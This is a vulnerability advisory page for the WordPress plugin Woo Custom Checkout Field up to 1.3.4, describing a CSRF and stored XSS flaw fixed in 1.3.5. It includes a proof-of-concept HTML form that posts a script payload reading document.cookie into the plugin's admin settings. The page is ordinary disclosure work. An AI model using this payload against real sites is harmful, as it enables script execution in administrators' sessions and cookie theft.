Woo Custom Checkout Field <= 1.3.4 – CSRF & Stored XSS | Plugin Vulnerabilities

Description

Due to a lack of CSRF mitigation and entity encoding in the ccf_insert function found on line 118 of include/ccf.php and in the output generated by template/datagrid.php, it is possible to store and execute scripts in the context of an admin user.

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=ccf_settings_menu">  
    <input type="text" name="txt_field_name" value="field_name">
    <input type="text" name="txt_field_class" value="&lt;script&gt;alert(document.cookie);&lt;/script&gt;">
    <input type="text" name="txt_field_placeholder" value="placeholder">
    <input type="text" name="txt_field_type" value="text">
    <input type="text" name="txt_field_options" value="">
    <input type="submit" name="add_field" value="Submit">
</form>

Affects Plugins

woo-custom-checkout-field

Fixed in 1.3.5

References

URL

https://plugins.trac.wordpress.org/changeset/1463103/woo-custom-checkout-field

URL

https://plugins.trac.wordpress.org/changeset/1461924/woo-custom-checkout-field

URL

https://rastating.github.io/woo-custom-checkout-field-1-3-2-csrf-stored-xss-disclosure

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

Rob Carr

Submitter website

http://blog.rastating.com/

Submitter twitter

Verified

No

WPVDB ID

fe890f5a-9e7b-48bc-8651-da02c6de95cf

Timeline

Publicly Published

2016-07-26 (about 9 years ago)

Added

2016-07-26 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2020-07-13

Title

Workup – Job Board < 2.1.6 - Unauthenticated Reflected XSS

Published

2025-01-06

Title

PIXNET Plugin <= 2.9.10 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2023-08-11

Title

WP 404 Auto Redirect to Similar Post < 1.0.4 - Admin+ Stored XSS

Published

2025-06-26

Title

Content Manager Light <= 3.2 - Reflected Cross-Site Scripting

Published

2021-04-13

Title

Sina Extension for Elementor < 3.3.12 - Contributor+ Stored XSS